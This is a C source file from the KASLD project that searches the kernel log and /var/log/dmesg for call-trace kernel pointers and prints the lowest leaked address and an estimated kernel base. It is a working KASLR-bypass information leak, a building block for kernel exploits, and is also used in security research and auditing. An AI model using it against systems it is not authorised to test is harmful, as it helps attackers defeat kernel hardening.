// This file is part of KASLD - https://github.com/bcoles/kasld
//
// Search kernel log for call traces and return the lowest address
// that looks like a kernel pointer.
//
// Requires:
// - kernel.dmesg_restrict = 0; or CAP_SYSLOG capabilities; or
// readable /var/log/dmesg.
// - kernel.panic_on_oops = 0 (Default on most systems).
// ---
// <[email protected]>
#define _GNU_SOURCE
#include "kasld.h"
#include "include/syslog.h"
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>
/*
 * Scan the kernel log obtained through mmap_syslog() for hexadecimal values
 * that follow a '[' or '<' character and fall inside
 * [KERNEL_BASE_MIN, KERNEL_BASE_MAX].
 *
 * Returns the lowest such value, or 0 when the log could not be obtained or
 * no value in range was found.
 *
 * Access to the log is gated by the settings listed in the file header
 * (kernel.dmesg_restrict / CAP_SYSLOG); a non-zero return from mmap_syslog()
 * is treated as "nothing available".
 *
 * NOTE(review): strtok() writes NUL bytes into the buffer, so this assumes
 * mmap_syslog() hands back writable memory - confirm against its definition.
 * NOTE(review): the buffer is not released in this function - confirm that
 * this is intentional for a short-lived process.
 */
unsigned long search_dmesg_kernel_pointers() {
  char *log_buf;
  int log_len;
  unsigned long lowest = 0;

  printf("[.] searching dmesg for call trace kernel pointers ...\n");

  if (mmap_syslog(&log_buf, &log_len))
    return 0;

  /* "[<" is a delimiter *set*: tokens are split on either character.
   * The text before the first delimiter is never examined. */
  (void)strtok(log_buf, "[<");

  for (char *tok = strtok(NULL, "[<"); tok != NULL;
       tok = strtok(NULL, "[<")) {
    /* strtoul() yields 0 when the token does not start with hex digits. */
    unsigned long candidate = strtoul(tok, NULL, 16);

    if (candidate == 0)
      continue;

    if (candidate < KERNEL_BASE_MIN || candidate > KERNEL_BASE_MAX)
      continue;

    /* Keep the smallest in-range value seen so far. */
    if (lowest == 0 || candidate < lowest)
      lowest = candidate;
  }

  return lowest;
}
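/*
 * Scan /var/log/dmesg line by line for hexadecimal values that follow a '['
 * or '<' character and fall inside [KERNEL_BASE_MIN, KERNEL_BASE_MAX].
 *
 * Returns the lowest such value, or 0 when the file cannot be opened or no
 * value in range was found. An unreadable log file (restrictive permissions)
 * takes the fopen() failure path and is reported through perror().
 */
unsigned long search_dmesg_log_file_kernel_pointers() {
  const char *path = "/var/log/dmesg";
  char *line = NULL;
  size_t cap = 0;
  unsigned long addr = 0;

  printf("[.] searching %s for call trace kernel pointers ...\n", path);

  FILE *f = fopen(path, "rb");
  if (f == NULL) {
    perror("[-] fopen");
    return 0;
  }

  while (getline(&line, &cap, f) != -1) {
    char *tok;

    /* "[<" is a delimiter *set*; the text before the first delimiter on the
     * line is never examined. */
    (void)strtok(line, "[<");

    while ((tok = strtok(NULL, "[<")) != NULL) {
      /* strtoul() yields 0 when the token does not start with hex digits. */
      unsigned long leaked_addr = strtoul(tok, NULL, 16);

      if (!leaked_addr)
        continue;

      if (leaked_addr >= KERNEL_BASE_MIN && leaked_addr <= KERNEL_BASE_MAX) {
        /* Keep the smallest in-range value seen so far. */
        if (!addr || leaked_addr < addr)
          addr = leaked_addr;
      }
    }
  }

  /* getline() owns and grows this buffer across calls and may allocate it
   * even when it fails, so release it unconditionally (free(NULL) is a
   * no-op). The original never freed it. */
  free(line);
  fclose(f);

  return addr;
}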
/*
 * Entry point: try the kernel log buffer first, then fall back to the
 * on-disk log file. Exits with status 1 when neither source yields an
 * address in range, otherwise prints the lowest address found and that
 * address masked with -KERNEL_ALIGN.
 */
int main() {
  unsigned long lowest = search_dmesg_kernel_pointers();

  if (lowest == 0) {
    /* The log buffer gave nothing; consult the log file instead. */
    lowest = search_dmesg_log_file_kernel_pointers();
    if (lowest == 0)
      return 1;
  }

  printf("lowest leaked address: %lx\n", lowest);

  /* Masking with -KERNEL_ALIGN clears the low bits, i.e. rounds down to the
   * alignment boundary (assumes KERNEL_ALIGN is a power of two - confirm in
   * kasld.h). The result is only an estimate, as the output label says. */
  printf("possible kernel base: %lx\n", lowest & -KERNEL_ALIGN);

  return 0;
}